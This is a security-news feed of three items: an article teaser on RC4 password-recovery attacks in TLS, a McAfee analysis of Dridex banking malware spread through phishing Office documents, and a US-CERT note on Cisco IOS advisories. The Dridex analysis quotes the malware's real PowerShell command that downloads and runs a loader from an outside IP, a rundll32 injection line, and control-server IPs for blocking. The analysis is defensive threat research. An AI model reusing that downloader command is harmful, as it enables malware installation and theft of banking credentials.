Noose around Internet’s TLS system tightens with 2 new decryption attacks

The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols.

Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream.

Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (226) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail.

Read 8 remaining paragraphs | Comments

‘Banking’ Malware Dridex Arrives via Phishing Email

Microsoft Office scripting malware has become more and more common and aggressive lately as malware authors constantly develop new techniques to evade detection and deceive users.

This kind of malware, as mentioned in previous posts, usually arrives as an attached document within a phishing email. After the “document” is opened, it downloads the second-stage payload, which downloads and executes the final payload that infects the host machine.

In a recent case involving the Dridex malware, McAfee Labs found the distribution method to be typical: The malware arrives via a phishing email:

Office Powershell - e-mail

We have discovered that the attached document can arrive in one of two variants:

  • The first variant comes as an XML document (.XML or .DOC) containing an embedded Office object encrypted in base 64. The object is decrypted and executed when the XML file is opened.
    Office Powershell - XML

    The embedded ActiveMime object contains an encrypted OLE document that is decrypted and executed just after the Office object is opened by the XML file.
    Office PowerShell - ActiveMime
    The OLE file then executes a malicious embedded macro that contains code similar to what we see in the following image. This code executes PowerShell and downloads the Dridex Loader.
    Office Powershell - Macro
  • The second variant comes as a Word or Excel file (.DOC or .XLS) that contains an Office Active Object which executes the malicious code in the OLE file as native OLE code.Office Powershell - OLE NativeThus, even if the user has not enabled the execution of macros, the malware can execute by running the malicious code directly from the OLE file. To deceive the user, the malware presents a document file with an Active Object embedded. As shown in the following image, the user is warned about opening malicious Active Objects, similar to the warning displayed next whenever a user tries to open a document containing an embedded macro:Office Powershell - Opening AttachmentOffice Powershell - Excel downloader
    An incautious user might open the embedded Active Object by ignoring the warning and double-clicking the object. In this case, the downloader code will run by executing a PowerShell instance, as in the previous variant.

In either case, the embedded malicious code will execute a command-line instruction that runs powershell.exe with the following parameters:

Office Powershell - Powershell

  • cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(‘hxxp:// 62.76.41.15 /asalt/assa.exe’,’%TEMP%JIOiodfhioIH.cab’); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe;

The preceding code will run only if powershell.exe is installed on the system. (The malicious URL has been edited for safety.)

After executing this code, the malware downloads and executes the Dridex loader, which downloads and installs the Dridex DLL on the system.

Office PowerShell - Powershell downloader traffic

Office Powershell - Dridex Running

This DLL is injected into explorer.exe by running the following command:

  • rundll32.exe “C:XX.tmp” NotifierInit

After executing this command, Dridex installs itself on the system, rundll.exe is terminated, and the host is infected. The malware then contacts its control server(s) to report the infection.

Dridex is “banker” malware that can steal user credentials for online accounts; it is derived from Cridex. Both are part of the GameOver Zeus malware family.

The following control servers were contacted by the malware during our research. We recommend blocking the following IPs:

  • 91.226.93.51
  • 82.151.131.129
  • 62.76.41.15
  • 178.32.184.7
  • 193.26.217.197
  • 193.26.217.221
  • 176.31.28.244
  • 74.208.68.243
  • 121.50.43.175

McAfee products detect this malware and its payload with the following detection names:

  • W97MDownloaders: W97M/Downloader.aen, W97M/Downloader.aev, W97M/Downloader.afc, X97M/Downloader
  • Dridex Downloader(Loader): Downloader-FAQM, Downloader-FAQZ
  • Dridex 32/64 bits: PWS-Dridex

The post ‘Banking’ Malware Dridex Arrives via Phishing Email appeared first on McAfee.

Cisco Releases Semiannual IOS Software Security Advisory Bundled Publication

Original release date: March 26, 2015

Cisco has released its semiannual Cisco IOS Software Security Advisory Bundled Publication. This publication includes seven Security Advisories that address vulnerabilities in Cisco IOS Software. Exploits of these vulnerabilities could result in a denial of service (DoS) condition, interface queue wedge, or exchange memory leak.

US-CERT encourages users and administrators to review the following Cisco Security Advisory and apply the necessary updates.
 


This product is provided subject to this Notification and this Privacy & Use policy.